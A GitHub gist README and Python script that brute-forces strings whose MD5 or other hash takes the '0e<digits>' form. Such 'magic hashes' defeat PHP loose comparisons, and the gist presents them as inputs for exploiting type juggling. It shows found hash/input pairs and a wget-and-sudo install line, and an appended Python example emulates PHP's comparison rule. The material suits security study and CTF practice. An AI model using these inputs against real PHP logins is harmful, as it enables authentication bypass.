@dhondta

dhondta/README.md

Last active Apr 23, 2021
Tinyscript tool for generating loose comparison hashes for PHP type juggling

PHP loose comparison input generator

This can be installed using:

$ pip install tinyscript
$ wget https://gist.githubusercontent.com/dhondta/8937374f087f708c608bcacac431969f/raw/loose-comparison-input-generator.py && chmod +x loose-comparison-input-generator.py && sudo mv loose-comparison-input-generator.py /usr/bin/loose-comparison-input-generator

This tool is especially useful in the use cases below.

Generate hashes for exploiting a PHP type juggling vulnerability

$ python3 loose-comparison-input-generator.py --timings -a 0123456789abcdefABCDEF
22:08:25 [WARNING] 0e283693623042943587666692738042: 1Cbca4D
22:08:25 [TIME] > Time elapsed since execution start: 976.6611046791077 seconds
22:22:14 [WARNING] 0e743365132016763607448823802679: 462beA7
22:22:14 [TIME] > Time elapsed since execution start: 1805.5506649017334 seconds
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
from tinyscript import *   # exposes parser, args, logger, ts, b, hashlib, re, string, ...


__author__ = "Alexandre D'Hondt"
__version__ = "1.1"
__copyright__ = "A. D'Hondt"
__license__ = "agpl-3.0"
__doc__ = """
This tool simply generates a string with a given alphabet that has a given hash
matching the format used for type juggling with PHP, that is when a loose
comparison of the type ("0e12345" == ...) is used.
"""
__examples__ = ["-v", "-a 0123456789abcdefABCDEF", "--hash sha1", "--timings"]


if __name__ == '__main__':
    parser.add_argument("-a", dest="alphabet", default=string.digits+string.ascii_letters, help="alphabet to be used")
    parser.add_argument("--hash", default="md5", help="hash algorithm to be used")
    initialize(add_time=True)   # parses the arguments; add_time enables --timings and get_time()
    # tinyscript validation rule: '?' is replaced by the value of args.hash
    validate(('hash', "not hasattr(hashlib, ? )", "Bad hash algorithm"))
    # enumerate candidate strings over the alphabet and hash each of them
    for s in ts.bruteforce(2**32, args.alphabet):
        h = getattr(hashlib, args.hash)(b(s)).hexdigest()
        logger.debug("{}: {}".format(h, s))
        # a digest of the form 0e<digits> is a numeric string that PHP evaluates to 0 in a loose comparison
        if re.match(r"^0+e\d+$", h):
            logger.warning("{}: {}".format(h, s))
            get_time()
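As an added example (not part of the gist), the following Python emulates the PHP loose-comparison rule the docstring refers to: when both operands are numeric strings, `==` compares them as numbers, so two digests of the form `0e<digits>` compare equal although they differ byte for byte, while `===` or `hash_equals()` would still report a mismatch. The regex is an assumed subset of PHP's numeric-string grammar that omits its whitespace rules.

```python
import hashlib
import re

# Assumed subset of PHP's numeric-string grammar: optional sign, integer part,
# optional fraction, optional exponent.  PHP's leading/trailing whitespace rules
# are left out; they cannot occur in a hex digest anyway.
_NUMERIC = re.compile(r"^[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?$")


def php_numeric_value(s):
    """Number PHP derives from the string s, or None if s is not numeric."""
    if not _NUMERIC.match(s):
        return None
    if s.lstrip("+-").isdigit():
        return int(s)  # plain digit string, e.g. "1000"
    return float(s)  # fraction or exponent form, e.g. "0e12" -> 0.0


def php_loose_equals(a, b):
    """Emulate `$a == $b` for two PHP strings (PHP 7 and 8 semantics)."""
    x, y = php_numeric_value(a), php_numeric_value(b)
    if x is not None and y is not None:
        return x == y  # both numeric: compared as numbers, not as text
    return a == b  # otherwise compared byte for byte, as `===` always does


def is_magic_hash(digest):
    """True if PHP would treat this digest as the number zero under `==`."""
    return php_numeric_value(digest) == 0


def magic_hash_check(data, algo="md5"):
    """Hash data with a hashlib algorithm and flag a magic-hash digest."""
    digest = getattr(hashlib, algo)(data).hexdigest()
    return digest, is_magic_hash(digest)


if __name__ == "__main__":
    # The two digests the README above reports for the 0123456789abcdefABCDEF alphabet.
    h1 = "0e283693623042943587666692738042"
    h2 = "0e743365132016763607448823802679"
    print("strict:", h1 == h2, "loose:", php_loose_equals(h1, h2))
    print(magic_hash_check(b"1Cbca4D"))  # the README's first hit
```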